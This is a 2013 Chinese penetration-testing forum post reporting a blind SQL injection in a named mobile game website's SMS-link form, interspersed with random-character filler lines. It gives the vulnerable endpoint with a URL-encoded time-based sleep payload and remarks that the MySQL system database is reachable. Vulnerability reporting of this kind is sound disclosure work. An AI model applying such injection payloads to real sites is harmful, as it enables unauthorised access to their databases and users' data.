中国网络渗透测试联盟
标题:
凤凰手机游戏网SQL盲注漏洞
[打印本页]
作者:
admin
时间:
2013-4-4 17:34
标题:
凤凰手机游戏网SQL盲注漏洞
简要描述:
" H' X9 S1 w) K- c. B$ J
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
& L% O6 w6 x% c, H. S
% Q' H+ D1 k; Q( x3 l; Z. T @
详细说明:
! x: J: e, z1 O; e
存在SQL盲注url:
# K4 b6 s C) f1 y; E5 u
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
; Z* @$ R" D$ |0 M6 c+ M
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
- D2 W8 i0 H( I1 I
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
; P) x+ B* g( [2 x' g" m* r; p/ v
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
+ ^' u2 X! {* w
8 N( I7 E4 e8 F1 p9 A7 ^, I2 i
能看到mysql系统数据库,看来user权限应该很高的。。
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2